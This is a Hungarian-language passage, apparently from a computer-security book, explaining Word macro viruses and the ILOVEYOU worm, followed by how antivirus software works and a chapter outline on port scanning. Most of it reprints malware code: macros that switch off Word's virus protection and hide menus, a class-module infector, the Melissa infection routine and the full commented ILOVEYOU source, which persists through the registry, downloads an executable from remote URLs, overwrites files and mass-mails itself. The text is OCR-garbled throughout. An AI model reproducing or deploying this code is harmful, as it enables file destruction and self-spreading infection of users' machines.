VirusProtection = False Eltávolítja a vírusvédelmet. a következő paranccsal lehet kikapcsolni a Registry-ből.dot mentésére.Delete Kiveszi a makrókra vonatkozó menüparancsokat. hogy a makrovírust elrejtjük. ami megvalósítható néhány programsorral. és sokkal tovább marad észrevétlen. Sub WordBasic.SaveNormalPrompt = False Ezzel a paranccsal kikapcsolja a párbeszédablakot."HKEY_CURRENT_USER\Software\ Microsoft\Office\9.. 5. „Levél") = /& A Programhiba esetén az On Error Resume Next -tel egyszerűen továbbfut. Options. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január L. így anélkül lehet megváltoztatni a Normal. CommandBars(''Format").Delete * Kiveszi a stílusokra vonatkozó menüparancsokat. Options.PrivateProfileString("". amelyekkel a Word a dokumentumokban előforduló makrókra reagál. Sub FileTemplates( ) On Error Ressume Next End Sub A felhasználó nem tudja elindítani a Sablonok és bővítmények ablakot. aki jól kiismeri magát a Wordben. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január 2. azután nullánál megtörténik a gonoszkodás. hogy azt a felhasználó észrevenné.DisableAutoMacros = 0 End Sub Az automakrók inaktívvá válnak. A Word kérdését.5..Controls(''Style.0\\Word\SecTírity".. kattint. . a hiányát csak az veszi észre. A fertőzésszámláló pontosan ezt a lehetőséget kínálja. akkor menj a Payloadra.Controls(''Macro").5 Ilyet is lehet: a vírus egy Payload-ot hív meg Hogy a vírus ne legyen azonnal aktív. Ehhez el kell helyezni egy kulcsot valahol a Registry-ben. Sub ToolsMacro( ) On Error Resume Next End Sub Ha a felhasználó az Eszközök/Makró/Makrók-ra.dot-ot.. CommandBars("Tools"). System. A megfelelő kódsorok egyszerű If lekérdezések. If x = 3 then Call Payload 'Ha x.. Ez úgy megy a legegyszerűbben.tehát azt jelentené. A vírus eltávolítja ezeket a bejegyzéseket. A felhasználó nem láthatja a párbeszédmezőt. hogy a makrókat lefuttassa-e. Ha a szám és a változó megegyeznek. akkor következik be az esemény: x=Int(Rnd * 100) 'X egy változó. SubViewVBCode( ) On Error Resume Next End Sub A felhasználó nem tudja elindítani a VB editort. Controls("Templates and Add-lns. "). akkor menj a payloadra. "). Természetesen a rendszeres összehasonlítás egy véletlenszámmal is lehetséges.Delete Kiveszi a sablonokra és a bővítményekre vonatkozó menüparancsokat. lefut ez a sub. CommandBars(''Tools"). ha nem lehet a menükből elindítani a megfelelő funkciókat. Ezen a helyen a ritkán használt parancsok elrejtése a Word 2000-ben különösen végzetesen hat: a felhasználó e beállítás miatt egyáltalán nem vesz észre bizonyos beavatkozási lehetőségeket. A rejtőzködéshez bizonyos menüparancsok kikapcsolása is fontos. egy folyamatellenőrzési lehetőséggel is fel van ruházva. Fontos még: mivel ennek a funkciónak a kikapcsolása a háttérben történik. amely egy 0-100 közti számot tartalmaz. amely alapértelmezésben rákérdez a Normal. Ugyanígy egy bizonyos napot is lehet használni. menj a Payloadra.

Replacement.Find:ExecuteReplace:=wdReplaceAll CommandBars("edit"). End Sub Ezentúl biztosan másképpen fogják kezelni a Word-figyelmeztetést. ha kapunk egy Word vagy Excel dokumentumot.6 Megfertőzött osztálymodulok A WinWord dokumentumok megfertőzésének egy másik módja az osztálymodulok megfertőzése. úgy találja meg ezt a párbeszédablakot. ").Find .5. A vírusvizsgálónk legyen mindig a legfrissebb..5.Save End Sub 5...").Subject = "Tárgy" . Az osztálymodulok ezért ugyanazokkal a tulajdonságokkal rendelkeznek. Például megváltozhatnának a dokumentum-tulajdonságok: hirtelen egy Dagobert kacsa írta a levelet vagy ilyesmi: Sub Payload( ) ActiveDocument.Text = "Mit keres" 'a cserélendő szöveg . és használjuk minden alkalommal.Keywords = "Keresőszó" . amelyeknek magunk írhatjuk a forráskódját. mert a makrókhoz és sablontartalmakhoz tartozó Makró és a Szervező ablakban nem mutatja őket a program.Wrap = wdFindContinue . ami sokkal nehezebbé teszi a vírus felfedezését. Az osztálymodulok bizonyos mértékig saját meghatározású vezérlőelemek. Százszázalékos védelem nem létezik.Delete CommandBars("edit").ClearFormatting With Selectíon.Forward = True .HomeKey Unit:=wdStory Selection.Execute").Format = False .Password = "hallo" 'Persze lehet véletlenszerű jelszót is csinálni. mint az eddig bemutatott makróvírusoké: itt már nem exportálnak és importálnak egy kódot minden jövendőbeli Word fájlba.Controls("Repeat" Replace.Delete CommandBars(''edit"). ha az Eszközök/Makró/Makrók Szervezőre kattint.Replacement.7 A vírus jelszóval védi a fájlt A jelszavas védelmet is be lehet kapcsolni egy makrovírussal: Sub Payload( ) ActiveDocument.Text = "Mire cseréli" 'amire cseréli . A kedvelt Keresés-Csere funkció most a vírust segíti: Sub Payload( ) On Error Resume Next Selection.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg A Payload mögött különféle ténykedések rejtőzhetnek.ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) . Az osztálymodulok megfertőzésének a stratégiája más. A víruskód . 5.Saved = False Then ActiveDocument. hogy kvázi „láthatatlanok". de hatékony megelőzés azért lehetséges.Execute End With End Sub Ugyanígy szavakat is kicserélhetünk Word parancsok segítségével. vagyis egy objektumot definiálunk tulajdonságokkal és eljárásokkal. egyes vírusprogramozók sportot űznek abból. vállalva a felfedezés veszélyét. hanem beolvassák a kódot.Comments = "Megjegyzések" . Az osztálymodulok a felhasználó számára nem olyan könnyen felismerhetők.MatchCase = False ..Controls("Replace.Find. és ezt a sztringet illesztik be egy másik osztálymodulba.Author = "Szerző" . amelyeket az időzített kioldó vált ki.Controls("UndoVBA-Find.5. Sajnos.Title="Cím" .MatchAllWirdForms = False End With Selection. mint a vezérlőelemek. Az osztálymodulok abban különböznek a felhasználó által meghatározott vezérlőelemektől.Delete If ActiveDociment. Aki szeretne utánanézni. hogy mindig új fertőzési módokat találjanak ki.MatchWholeWord = True .

. hogy előzőleg törölnénk ' a sorokat..VBComponents( l). VBComponents(l). VBComponents(1). hogy világossá tegye a mögötte rejlő meggondolásokat.. ' Figyelembe kell venni.Lines(az l. és hogy a víruskód a Normal.End With-blokkba zárunk. VBProject. tudjuk. amelyek előzőleg ott voltak. . ' amelyet meg kell fertőzni. és csak a dokumentumban vagy a Normal.dot-ban vagy a dokumentumban) 'a ThisDocument. ' Létrehozzuk a változóinkat. hogy már az aktuális dokumentum is ' fertőzött. . nem pedig ' AutoOpen( ). hogy Source. Ha ezt valaki elfelejti. törölve ' lesznek.' Ezzel biztosak lehetünk abban. akkor nincs szükség ' az objektumnév ismétlésére.Name ' Mivel nem tudjuk. Most Document_Open( ) a neve.megnyitáskor láthatatlanul integrálódik minden további dokumentumba.CodeModule End If With Source VirCode = . VBProject.dot-ban vagyunk. Source. amilyen hosszú a modul. Private Sub Document_Open( ) ' Ez a Sub mindig lefut.VBComponents(l). az hibaüzenethez vezetne. hogy a vírus végrehajtódik.VBComponents(1). Ez azonban azt is jelenti. A kód beolvasásához tehát ki kell találni. ' Az l.Lines(l.. ezt az új felülírja.CodeModule 'Ha a Normal. VirCode ' A beolvasott sztring beillesztése a modulba.' annyi sort kell törölni. ' A Sub neve is megváltozott. .VBProject.VBProject. kommentárokkal a kódban.. hogy az aktuális dokumentumot kell ' megfertőzni. és beírjuk a modulba. ' hogy ha ott egy másik vírus volt.dot" Then Set Source = NormalTemplate. ' .. . hogy a SUB Priváté..CodeModule Set Target = NormalTemplate. amilyen hosszú a modul). ' mert minden kód megfertőzésénél azok. CodeModule ' Az indexszám l a VBComponents(l)-nél mindig a „ThisDocument" osztálymodul. Egy osztálymodulban mindennek ' Private-nak kell lennie. annyi sort. hol vagyunk (a Normal. VBProject. End With Egy igazi vírus persze sokkal nagyobb ennél. Else ' ha nem a Normal. sortól kezdve. Az 1. Így ez csak elpazarolt processzoridő.' megtalálható lenne. Ha a vírus ott már .dot-ból jön. abból azután már logikusan következik.CountOflines adja vissza a sorok/Lines számát a modulban.CountOflines) End With ' Ha egy objektumot egy With. sortól beolvasni.DeleteLines l. annak fertőzésnél azonnal hibát jelez.InsetLines l. . ' Tehát ott van. With Target . ' Source..dot-ban vagyunk.Name adja a választ If MyPos = „Normal. hogy hol vagyunk.CountOflines) ' Most a teljes víruskód a VirCode-ba lesz beolvasva.. és még Stealth-funkciókat is tartalmaz. Ezt ebben a példában nem ellenőrizzük.Lines(l. anélkül. íme egy példavírus. már csak egy lehetőség marad hátra Set Source = ActiveDocument.dot-ban lehet. ' ActiveDocument. hogy mit kell megfertőzni. De lehetséges.. sortól kezdve. és VirCode a sztring... ha egy dokumentumot megnyitnak.CountOflines ' A megfertőzendő fájlban minden sort törölni kell. hogy ott már semmi sincs. On Error Resume Next ' a szokásos történet a hibával MyPos = ThisDoaiment. A programozás stuktúrájához egyszerűen azt kell elképzelni.CodeModule Set Target = ActiveDocument.

1) ="" ADIl. ADIl. NTCL SetToInfect = NTIl NTILName = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do WhileADIl. május 4-én jelezték.CodeMOdule. "Document") = False) Then ActiveDocument.CountOfLines BGN =2 If ADILName <> "Melissa" Then IfADCL>OThen_ ADIl.Item(l) -re. VBProject.CodeModule.Saved = True End If End Sub CUT HERE 5. ActiveDocumentName.InsertLines BGN. Most minden idők egyik legveszélyesebb vírusát fogjuk alaposabban szemügyre venni.SaveAsFileName:=ActiveDocument. ActiveDocumentName.Lines Loop ToInfect. „Document") <> False) Then ActiveDocument. hogyan fertőzi meg az osztálymodulatokat a Melissa: CUT HERE Priváté Sub Document_Open( ) On Error Resume Next Set ASI1 = ActiveDocument.CodeModule.DeleteLines l.CodeModule. VBComponents.VBProject.Lines(BGN. és a hálóra csatlakoztatott cégek 90% -át megfertőzte.CodeModule. A LoveLettert először 2000.DeleteLines l Loop ToInfect.CodeModule.InsertLines EGN. Néhány órán belül világszerte elterjedt.CodeModide-. .VBProject.CodeModule. 1) BGN = BGN + l Loop End If If DoAD = True Then Do While NTIl.AddFromString ("Private Sub Document_Close( )") End If CYA: Do While ADIl. NTCL = Hni. 1) BGN = BGN +l Loop If NTCL <> 0 And ADCL = 0 And (InStr(l.DeleteLines l. 1) = "" NTIl.Lines(1.VBComponents.CodeModule.VBComponents.CodeModule.CodeModule.Lines(BGN.Item(l) 'Állítsd ADIl-et ActiveDocument.FullName Elself (InStr(l.VBProject.NTIl.Lines(BGN.Lines(BGN.VBComponents.AddFromString ("Private Sub Document_Open( )") Do While NTIl.CountOfLims ADCL = ADIl. Set NTI1 NormalTemplate.Item(l) 'Állítsd SetNTIl-et NormalTemplate. 1) <> "" ToInfect.CodeModule. mellékletként.Item(l)-re.Lines(1.CodeModule.CodeModule. 1) <> "" ToInfectCodeModule. ADCL SetToInfect = ADIl ADILName = "Melissa" DoAD = True End If If NTILName <> "Melissa" Then If NTCL >0 Then _ NTIl.CodeModule.7 ILOVEYOU A LoveLetter egy VBS-féreg (Vimal Basic Script) amely e-mailen keresztül terjed.Az alábbiakban egy példával világítjuk meg.

és törölte a webhelyet. . A féreg. gyorsan kapcsolt. A féreg.vbs. vagy a gépet is rögtön kilőni! A féregnek egy variánsa aktiválta a jelszó cache-elést.. mivel ezekbe a statisztikákba nem kerülnek be a magánfelhasználók gépei. hogy minden döntő bizonyítékot töröljenek a gépeikről. Ugyanott a féreg a WIN-BUGSFIX programot is le akarta tölteni..5. aminek következtében néhány céges hálózatnak teljes egészében le kellett mondania a mailküldésről. • LOOK! • How to protect yourself from the ILOVEYOU bug! Az Amable Mendoza Aguila Computer College-ben. A féreg manipulálta még a következő Registry-bejegyzéseket: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 HKEY_LOCAL_MACHINE\Sofrware\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \WN-BUGSFIX Miután lefuttatták.. illetve elrejtette az .mail. . hogy minden js. amely magától terjed az interneten vagy a helyi hálózaton keresztül. a nem hivatalos számok azonban ennél jóval magasabbak.ini fájlját. a Taskmanager-en is megjelent mint w_srcipt. mint az ILOVEYOU esetében. a Sky Internet Inc. • Joke • Mothers Day Order Confirmation • Dangerous Virus Warning • Vírus ALERT!!! • Important! Read carefully!! • I Cant Believe This!!! • Thank You For Flying With Arab Airlines • Variant Test • Yeah.hta.mp3 és az . hivatalos számok szerint. Így nagy forgalom keletkezett a cégek belső hálózati mailszerverein. amely jelszavakat kémlel ki.jse. amelyek között ott volt a fertőzött is.vbs fájlt.css.sct. hogy egy csatorna minden látogatója.jpg fájlt használhatatlanná tett. A károkat több milliárd dollárra becsülték..er. Miközben a féreg aktív volt. 600 ezer számítógépet ért el. és ezután a cache-elt jelszavakat elküldte mailben. automatikusan elküldte magát a címjegyzék e-mailcímeire. . .trajan-by spyder. mivel a Fülöp-szigetek-i szolgáltató. Az eddig ismert változatok: • ILOVEYOU • Susitikim shi vakara kavos puodukui. . amelyeket azonban hamarosan nem lehetett elérni.1 Mi az a féreg? A féreg egy darabkányi kód. Időközben a hackereknek volt idejük.e. .7. A legdestruktívabb azonban az a tény volt.. Yeah another time to DEATH. Sok cég megelőzésképpen leválasztotta mailszerverét a netről. s ez az érintett szerverek tisztán materiális kiesési ideje. hogy részt vettek a Bárok 2. .send.1 szoftver fejlesztésében.passwords. és ezeket Access Net accountokra kellett volna küldenie.mp2 fájlokat.. legfeljebb magas forgalmat (traffic) generál. ezzel az üzenettel: Bárok..7. míg a hatóságok napokon át semmit sem tettek.jpeg. a rendszergazdák félelmeit és feldühítését még egyáltalán nem számoltuk. . a Spyder nevet használó hacker munkahelyén 10 személyt gyanúsítottak azzal. 5.wsh.2 A működési mód Az ILOVEYOU féreg egy weboldalról töltött le egyes bannereket. A féreg az Outlookon és a mIRC-en keresztül is terjedt. Úgy módosította a mIRC script. megkapta a . A vírussal ellentétben a féreg nem közvetlenül rombol. . Két prominens áldozat is volt: a ZDF tévéadó és az Expo-világkiállítás. Ebben az esetben gyorsan be kellett zárni ezt a feladatot.

Copy(dirwin& "\Win32DLL. A következő sorban ez meg is történik: a program az OpenTextFile-lal és az azután következő ReadAll( ) -lal beolvassa magát a memóriába.com / ©GRAMMERSoft Group / Manila.EXE vagy a . Set so = CreateObject("Scripting. de hangsúlyozzuk. hogy ebben a formájában teljesen hatástalan.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.GetFile(Wscript. Sokan azt hitték. és a Registry-bejegyzések eltávolítása. ezekkel a változókkal fog a későbbiekben dolgozni. hogy ActiveX-kontrollok és más scriptek is veszélyesek lehetnek. A vírus a Windows Scripting Host-tal hajtódik végre.TXT.Philippines Ezek a sorok csak szerzői kommentárok.file.7.Regread(''HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout") if (rr>=l) then wscr. akiknek a részvényei 10%-kal is emelkedtek. rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail. On Error Resume Next dimFSO.GetSpecialFolder(2) Set c =fso. valamint a *.dirwin. Ellenintézkedésként ajánlkozik a WindowsScripting hostok eltávolítása uninstall-lal.7.4 A forrás .Az eset egyedüli nyertesei az antivírusok gyártói voltak.kommentárokkal A továbbiakban az ILOVEYOU vírus forráskódja látható.vbs") c. 1) vbscopy=file. Az On Error Resume Next-tel a hibakezelést vezeti be: ha a program futtatása közben hiba lép fel.ReadAH A program ezután egy FileSystemObject-et (fso) hoz létre.COM fájlok jelenthetnek veszélyt. főleg az internetes újoncokban. mint az .dow eq="" ctr=0 . "REG_DWORD" end if Set dirwin = fso.Shell") rr=scr.vbs fájlok törlése a Windows és a Windows/System könyvtárból. akkor a következő lépéssel kell folytatni.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout".GetSpecialFolder(0) Set dirsystem =fso.vbscopy.ScriptFullName) c. tehát a szerző mailcíme és álneve.vbs") regruns( ) html( ) spreadtoemail( ) listadriv( ) end sub 5. Ennek a féregnek semmi esélye sem lett volna. de sehol nem jelent meg róla még felvilágosítás. main( ) sub main( ) On Error Resume Next dim Tvscr. még nem ismert általánosan.dirtemp. Open TextFile (Wscript. nemhogy egy analízis háttérinformációkkal a felhasználók számára.FileSystemObject") set file = f s o . Copy(dirsystem& "\MSKernel32.eq.GetSpecialFolder(l) Set dirtemp = fso. nem tudatosulnak a hálóval kapcsolatos veszélyek. Az ILOVEYOU vírus téma a múltban nagyon gyakran szerepelt a médiában. Ezután definiál néhány változót. ha minden végfelhasználó tudott volna a Visual Basic Script veszélyeiről. ScriptFullname. hibaüzenet nélkül. Ezzel az objektummal lehet fájlokat elérni.3 Hogyan tudott a féreg elterjedni? A féreg terjedésének az alapja az volt.rr setivscr=CreateObject("Wscript. hogy csak a végrehajtható fájlok.0. 5.vbs") c.dirsystem. Az. A célja csak a felépítés bemutatása és kommentálása sorról sorra.ctr. a vírus működésére nincs semmilyen hatásuk. hogy manapság.

html( ).downread& "\WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Sofrivare\Microsoft\InternetExplorer\Main\Sart Page". illetve LOVE-LETTER-FOR-YOU. net/ ~yotmg l s/HJKjnwerhjkxcvytwertnMTFwerdsfmhPnjw6581345gvsdfl619njbvYT/ WIN-BUGSFIX.skyinet. "http://www.vbs. amihez a következő függvényeket hívja meg: regruns( ).exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page". hogy azután a maga egyik másolatát tegye le a következő neveken: MSKernel32. Mikor a vírus így bemásolta magát. A többi funkciót a forrásszöveg folyamatában magyarázzuk el. Először a CreateObject( ) -tel egy Shell objektumot hoz létre . a működési módjukkal együtt.skyinet.skyinet. és írni lehet bele. ami később meg is történik.dirsystem&"\MSKernel32.exe end if end if if (fileexist(dovmread&"\WIN-BUGSFIX.ez az objektum teszi lehetővé a Windows különböző funkcióinak az elérését. .exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main \Sart "about:blank" end if end sub A regruns( ) funkciónak különböző feladatai vannak a Registry-ben. valamint a Windows/System (dirsystem) könyvtárat. A Set parancsokkal kérdezi le a program a Windows könyvtárait (dirwin). Ki lehet például olvasni a Registry-t. "http://www.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Download Directory") if (downread="") then downread="c:" en if if<fíleexist(dirsystem&"\WinFAT32.Innentől kezdődik a vírus főrutinja.net/ ~koichi/jf6TrjkcbGRpGqaql98vbFV5hfFEjbopBdQZnmpOhfgER61b3Vlrvg/ WN-BUGSFIX. Win32DLL. Page".exe")=l) then Randomize num = Int((4 * Rnd) +1 if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". A CurrentVersion/Run alatt két kulcsot hoz létre. MSKernel és Win32DLL név alatt. amely valójában még egyszer tartalmazza a vírust. A html( ) egy helyi HTML-fájlt helyez el. hozzákezd az igazi feladatához.skyinet.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \RunServices\Win32DLL ".dirwin8í "\Win32DLL. spreadtoemail( ) és listadriv( ).exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run \ WIN-BUGSFIX".TXT. net/~chu/ sdgfhjksdfiklNBmnfgkKLHjkq'wtiiHJBhAFSDGjkhYUgq'werasdjh PhjasfdglkNBhbq'webmznxcbvnmadshfgq'w23146I234iiiylthjg/ WIN-BUGSFIX. Ezek a fájlok tehát kizárólag a vírust tartalmazzák. "http://www.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ".vbs. és ezt indításkor végrehajtja. mindkettő a vírus előzőleg létrehozott másolatára mutat. sub regruns( ) On Error Resume Next Dim num.downread regcreate "HKEY__LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \Run \MsKernel32 ".net/ ~angelcat/skladjflfdjghKJnmtryDGFikjUlyqwrWe546786324hjk4jnHH GbvbmKL/ JKjhkqj3w/ WIN-BUGSFIX. "http://www.vbs.

2. egyszerűen a C:-t használja. bname.write vbscopy ap.net egyik szerverére vezet.patb&"") end if Next listadriv = s end sub Ez a függvény minden meghajtót kilistáz.copy(f1. Ez azt jelenti.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (Ext="sct") or (ext="hta") then set ap=fso.true) ap.vbs") fso.path) next end sub . ehhez négy különböző oldal szolgál választékul.path&". amelyet meg fog fertőzni: sub infectfiles(folderspec) On Error Resume Next dim f.GetFile(f0. ap.path. Erről az oldalról azután még egy további fájlt is automatikusan letölt a vírus.A Run alatti bejegyzések a Windows indításakor automatikusan lefutnak. ez a fájl megintcsak bejegyzi magát a Registry-be.write vbscopy ap. Ez a funkció a mappák egyes fájljait szerkeszti.path) cop. amelybe a megfelelő fájlokat tölti az Internet Explorer.GetBaseName (f1.Files for each f1 in fc ext=fso. mircfname.path) cop. 2. sf for each f1 in sf set f=fso. Röviddel az ILOVEYOU megjelenése után azonban a skyinet. true) ap.copy(folderspec& ""&bname& ".path.path) folderlist(f1. GetExtensionName (f1 .Drives For Each d in de If d. és ezután meghívja a folderlist függvényt.DriveType = 2 or d. GetFolder(folderspec) set sf=f. 2. Minden oldal a skyinet. Ezután a vírus az Internet cache-t keresi. fc. OpenTextFile(f1.write vbscopy mp3.close set cop=fso.path) elseif(ext="jpg") or (ext="jpegn) then set ap=fso.vbs") fso. s hogy pontosan mit is tesz.path. s. ext.FetFile(f1.DriveType=3 Then folderlist(d. GetFolder(folderspec) set fc =f. sub folderlist(folderspec) On Error Resume Next Minden mappán végrehajtja az InfectFiles funkciót.name) if (ext="vbs") or (ext="vbe") then set ap=fso.dc. és eltávolította a szerverről a megfelelő oldalakat.SubFolders infectfiles(f1. hogy a következő Windows-indításnál végrehajtódik.OpenTextFile(f1. Most a program megváltoztatja az Internet Explorer kezdőlapját.net lépett. hogy a következő rendszerindításkor a vírus ismét elindul.path) elseif(ext="mp3" ) or (ext="mp2") then setmp3=fso.close dim f. tehát azt a könyvtárat. amely a meghajtókon található minden mappát megdolgozza.vbs") mp3.DeleteFile(f1. mp3 set f=fso.write vbscopy ap.s Set dc =fso.DeleteFile(f( ). az majd később következik.close bname=fso.path) set cop=fso. úgy. s támogatja a vírus működését. f1.path&". és újból kezdi a működését. f1.path) ext=Icase(ext) s=Icase(f( ). Minden fájlt felsorol.OpenTextFile(f0). sub listadriv On Error Resume Next Dim d. true) ap.CreateTextFile(f1. Ha a vírus nem talál cache-t. amelyek közül véletlenszerűen választ ki egyet.

hlp") then set scriptini=fso. Ha talál egy mIRC-et (Chat Scriptet).ini") or (s="mirc.regualue) Set regedit = CreateObject("Wscript.regv.HTM" script.mIRCScript" script.Shell") regget=regedit. . amelyeket a program más pontjain használ fel.ini-t.regad .KhaledMardam-Bey" script. hogy egy LOVE_LETTER_FOR_ YOU.set att=fso.js.exe") or (s="mlink32.attributes+2 end if if (eq<>folderspec) then if (s="mirc32. mIRC will corrupt.WriteLine "[script] script.http://www.ini.ini.ini.. és ellenőrzik. ugyancsak a vírust terjeszti úgy.WriteLine ". thanks" script.ini. WINDOWS will affect and will not run correctly.ini." script. ha lefut.WriteLine "n2= /.. Megkeres minden. és a saját magáról készített másolattal írja felül ezeket. com " script.ini.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.HTM nevű fájlt küld a csatorna minden felhasználójának. 1.ini.regedit.ini.dcc send "&dirsystem&\LOVE_LETTER_FOR_YOU. megadott kiterjesztésű (." script. mirc.GetFik(f1.close eq=folderspec end if end if next end sub Az InfectFiles -nak két feladata van.ini.ini.WriteLine ".exe") or (s="mirc.malead. if mIRCwill" script. Please dont edit this script.WriteLine "n3=}" script.Shell") regedit.ini. Ezek a függvények egy Registry-bejegyzést készítenek.WriteLine "n0=on 1:JOIN:#:{„ script. WriteLine " corrupt.. Ez a script. A következő függvények segédfüggvények.RegWrite regkey.WriteLine " n 1 = / i f ( = = ) {halt}" script. akkor felülírja a script.ini") script.ctrlists. 2.ini. hogy léteznek-e bizonyos fájlok vagy mappák.) fájlt.wsh.attrihites=att. GetFolderExist(folderspec)) then msg = 0 else msg = l end if fileexist = msg end funrtion sub spreadtoemail( ) On Error Resume Next dimx. WriteLine ".FileExist(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if ( f s o .ini.regvalue end sub function regget(value) Set regedit = CreateObject("Wscript.ini") or (s="script.a.CreateTextFile(folderspec& "\script.path) att.ctrentries..css stb.b.WriteLine ".WriteLine ".WriteLine ". sub regcreate(regkey. .

Count set a=mapi. mint a normál víruskeresésnél. Csak ezért tudott ennyire gyorsan elterjedni. Amint látjuk.Createltem(0) male. hogy azután a címjegyzékben talált minden címre elküldje a vírus másolatát. akkor ezt összehasonlítja az adatbázis lenyomataival. és ezzel potenciálisan olyan vírusokat is leleplezhet.8. Count>inr(regv)) then for ctrentries=l to a.a feldolgozhatatlan mennyiségű e-mail miatt milliós volt.Body =vbcrlf&"kindly check the attached LOVELETTER comingfrom me. Ez a program tulajdonképpeni terjedési módja: lefut.AddressLists. A szkenner ellenőrzi egy fájl vagy egy program kódját. amelyben a Windows minden mailcímet tárol.setregedit=CreateObject("Wscript.1 Szkennermodul A szkennermodul a vírusok felkutatásáért felelős a merevlemezen. 1. Az internet-." male.EXE). 5. GetNameSpace("MAPI") for ctrlists=1 ro mapi. és látogatják az idevágó newsgroupokat.AddressEntries. többnyire csekély. . az ILOVEYOU.Application ") set mapi=out. TXT. vbs") male. A szkennermodul a vírusok sztringjeit és viselkedési módját is felismeri. tehát a címjegyzéket (WAB. Az eljárás neve Pattern Matching.8 Hogyan működnek a vírusvizsgálók? A vírusvizsgáló egy adatbázist használ.Subject = "ILOVEYOU" male. amit talál. Az ilyen szkennelésnél a hibaszázalék magasabb.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead) if(regad="") then set male=out. "REG_DWORD" endif x=x+l next regedit.a.Recipients. ehhez a szoftver gyártói saját víruslaborokat tartanak fenn. A legtöbb vírusvizsgáló frissítésekkel folyamatosan bővíti az adatbázisát. CreateObject("Outlook.Count malead=a. Count endif next x=l Set out=Nothing Set mapi=Nothing end sub A SpreadToEmail( ) függvény megnyitja a programot.RegRead(''HKEY_CURRENT_USER\Software\Microsoft\ WAB"&a) if(regv="") then regv=l end if if (int(a. amelyek még nincsenek benne az adatbázisban.Attachments. hogy megállapítsa a víruskódokkal való egyezést.AddressLisets(ctrlists) regv=regedit. Ha a szkenner megváltoztatott kódot vagy valamilyen egyéb eltérést észlel.Send regedit. az egyszerűsége ellenére. amelyet a felhasználóknál hátrahagyott. úgynevezett nyomozócsapatokat foglalkoztatnak. igazán komplex funkciókkal van felszerelve. AddressEntries.Add(malead) male. A kár.Sheir) set out=WScript. csak különböző script-fáljokat írt át. hogy folyamatosan tudjanak reagálni az új fenyegetésekre. amely minden felismerhető vírus nevét és lenyomatát tartalmazza.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&:a. illetve mailszolgáltatók kára viszont . és elküldi magát minden címre.Add(dirsystem& "\LOVE-LETTER-FOR-YOU.AddressEntries(x) regad="" regad=regedit. 5.AddressEntries.RegWrite "HKEY_CURRENT_USER \Software \Microsoft\WAB"&malead.

A következő szempontokra kell ügyelni: • A kínált programfrissítési gyakoriság (legjobb hetente egyszer) • Az ügyféltámogatás minősége • Szkennelési sebesség • Szkennelési minőség • Lehetséges-e a szkennelés a háttérben. hogy milyen nagy a fertőzés kockázata. Úgy van beállítva. ez a modul lép akcióba. a víruspajzs azonnal megvizsgálja.2 Víruspajzs A víruspajzs egy memóriarezidens. Ennek a modulnak. a háttérben működő szkenmodul. és mennyibe kerülne az adatok újbóli előállítása.4 A vírusvédő program kiválasztásának a szempontjai Hogy mennyit akarunk vagy kell ráfordítanunk egy-egy virusvizsgálóra. 5. A hátránya. azaz áthelyezi egy „karanténkönyvtárba". hogy a vírusprogramtól függő mértékben visszafogja a rendszerteljesítményt. vagy törli a fájlt. folyamatosan kövesse a felhasználók minden fájlelérését. különböző opciói vannak a vírus eltávolítására. hogy valamiképpen megtisztítsa. ha nincs rá lehetősége. és ha szükséges. 5.8.8. a fertőzéstől függően. az attól függ. Vagy megtisztítja a fájlt a vírustól.3 „Fertőtlenítő" Ha a szkenner vírust talál. vagy elkülöníti. kijelölnek.8. vagy feleslegesen bonyolult? . átnevezik vagy letöltik a hálóról. jelentést tesz.5. hogy valós időben. vagy a szkennelés leállítja a rendszert? • Felismeri-e a program a vírusokat már letöltés közben? • Meg tudja-e találni a szoftver tömörített fájlokban is a vírusokat? • Tudja-e ellenőrizni az e-mailhez csatolt fájlokat (attachments) már az elindításuk előtt? A kezelése kényelmes. Ha egy fájlt elindítanak.

8 A nyitott portok csak a kezdetet jelentik 6.5 UDP-ICMP-Port-Unreachable szkennelés 6.6.3 TCP-FIN-Scan 6.1.2.2.2.2.2.2. 6.2.1 Szkenneles teljes TCP-kapcsolattal 6. A szkenner Szkennelesi eljárások 6. fejezet .2.6 UDP-Recvfrom-And-Write szkennelés 6.7 ICMP-echo-scanning/ping-szkennelés 6.4 Fragmentált szkennelés 6.Tartalom 6.9 A portszkennelés elleni védelem .2.2 Félig nyitott TCP-szkennelés 6.2.

